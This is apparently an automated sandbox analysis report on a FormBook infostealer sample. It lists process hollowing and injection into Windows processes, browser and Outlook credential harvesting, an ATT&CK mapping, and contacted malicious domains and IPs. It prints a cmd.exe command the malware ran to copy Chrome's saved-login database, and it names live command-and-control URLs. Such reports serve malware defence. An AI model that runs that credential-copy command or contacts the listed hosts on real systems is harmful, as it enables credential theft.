Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEA309 mov eax, dword ptr fs:[00000030h]	7_2_02CEA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov eax, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov ecx, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov eax, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov eax, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov eax, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D5B8D0 mov eax, dword ptr fs:[00000030h]	7_2_02D5B8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC70C0 mov eax, dword ptr fs:[00000030h]	7_2_02CC70C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC70C0 mov eax, dword ptr fs:[00000030h]	7_2_02CC70C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D818CA mov eax, dword ptr fs:[00000030h]	7_2_02D818CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC78D6 mov eax, dword ptr fs:[00000030h]	7_2_02CC78D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC78D6 mov eax, dword ptr fs:[00000030h]	7_2_02CC78D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC78D6 mov ecx, dword ptr fs:[00000030h]	7_2_02CC78D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC58EC mov eax, dword ptr fs:[00000030h]	7_2_02CC58EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB8E4 mov eax, dword ptr fs:[00000030h]	7_2_02CEB8E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CEB8E4 mov eax, dword ptr fs:[00000030h]	7_2_02CEB8E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC40E1 mov eax, dword ptr fs:[00000030h]	7_2_02CC40E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC40E1 mov eax, dword ptr fs:[00000030h]	7_2_02CC40E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC40E1 mov eax, dword ptr fs:[00000030h]	7_2_02CC40E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5 mov eax, dword ptr fs:[00000030h]	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5 mov eax, dword ptr fs:[00000030h]	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5 mov eax, dword ptr fs:[00000030h]	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D860F5 mov eax, dword ptr fs:[00000030h]	7_2_02D860F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28FD mov eax, dword ptr fs:[00000030h]	7_2_02CD28FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28FD mov eax, dword ptr fs:[00000030h]	7_2_02CD28FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28FD mov eax, dword ptr fs:[00000030h]	7_2_02CD28FD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC9080 mov eax, dword ptr fs:[00000030h]	7_2_02CC9080
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC3880 mov eax, dword ptr fs:[00000030h]	7_2_02CC3880
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CC3880 mov eax, dword ptr fs:[00000030h]	7_2_02CC3880
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D43884 mov eax, dword ptr fs:[00000030h]	7_2_02D43884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02D43884 mov eax, dword ptr fs:[00000030h]	7_2_02D43884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov eax, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov eax, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov eax, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov ecx, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov eax, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CD28AE mov eax, dword ptr fs:[00000030h]	7_2_02CD28AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0 mov eax, dword ptr fs:[00000030h]	7_2_02CF20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0 mov eax, dword ptr fs:[00000030h]	7_2_02CF20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0 mov eax, dword ptr fs:[00000030h]	7_2_02CF20A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 7_2_02CF20A0 mov eax, dword ptr fs:[00000030h]	7_2_02CF20A0

Source: C:\Users\user\Desktop\11-27.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 198.20.71.158 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.171.195.105 80			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\11-27.exe	Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\11-27.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Thread register set: target process: 3440	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\11-27.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\11-27.exe	Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 950000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 80000	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 90000	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Jump to behavior

Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000001.00000000.355191624.0000000000EE0000.00000002.00000001.sdmp, msdt.exe, 00000006.00000002.606829673.0000000002FD0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\msdt.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\msdt.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.411551664.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420984310.0000000003280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433927782.0000000003290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.420714851.00000000030C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.433471345.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.421063196.00000000032B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.606704866.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.436004947.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416656811.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.416715788.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.419388564.00000000051EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.433805167.0000000003260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.604691451.00000000002E0000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Registry Run Keys / Startup Folder1	Process Injection512	Deobfuscate/Decode Files or Information1	OS Credential Dumping1	System Network Connections Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Obfuscated Files or Information3	Credential API Hooking1	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Information Discovery12	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rootkit1	NTDS	Security Software Discovery221	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Application Layer Protocol15	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection512	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Network Configuration Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
11-27.exe	29%	Virustotal		Browse
11-27.exe	69%	ReversingLabs	Win32.Trojan.Wacatac
11-27.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Hmptdrv.exe	69%	ReversingLabs	Win32.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.11-27.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
5.2.Hmptdrv.exe.2e50000.4.unpack	100%	Avira	TR/Hijacker.Gen	Download File
2.2.Hmptdrv.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
5.2.Hmptdrv.exe.2cd0000.3.unpack	100%	Avira	HEUR/AGEN.1108768	Download File
5.2.Hmptdrv.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
2.2.Hmptdrv.exe.3230000.5.unpack	100%	Avira	TR/Hijacker.Gen	Download File
0.2.11-27.exe.2e80000.5.unpack	100%	Avira	TR/Hijacker.Gen	Download File
2.2.Hmptdrv.exe.2cf0000.3.unpack	100%	Avira	HEUR/AGEN.1108768	Download File
0.2.11-27.exe.2d00000.4.unpack	100%	Avira	HEUR/AGEN.1108768	Download File

Domains

Source	Detection	Scanner	Label	Link
discord.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
https://discord.com/	0%	URL Reputation	safe
http://www.horne-construction.com/gwg/	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
https://discord.com/2	0%	Avira URL Cloud	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
horne-construction.com	198.20.71.158	true	true		unknown
www.systemmigrationservices.com	213.171.195.105	true	true		unknown
discord.com	162.159.136.232	true	false	1%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.129.233	true	false		high
www.milavins.com	unknown	unknown	true		unknown
g.msn.com	unknown	unknown	false		high
www.horne-construction.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.horne-construction.com/gwg/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1	msdt.exe, 00000006.00000003.407062323.0000000000545000.00000004.00000001.sdmp	false		high
http://search.ebay.de/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.msn.com/de-ch/ocid=iehp%	msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	false		high
https://discord.com/	11-27.exe, 00000000.00000002.420157777.0000000002D80000.00000004.00000001.sdmp, Hmptdrv.exe, 00000002.00000002.415239015.0000000002D70000.00000004.00000001.sdmp, Hmptdrv.exe, 00000005.00000002.430400234.0000000002D50000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sogou.com/favicon.ico	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000001.00000000.376582245.000000000B1A6000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 00000001.00000000.371310874.0000000007983000.00000002.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpK	msdt.exe, 00000006.00000002.605346357.0000000000518000.00000004.00000020.sdmp	false		high
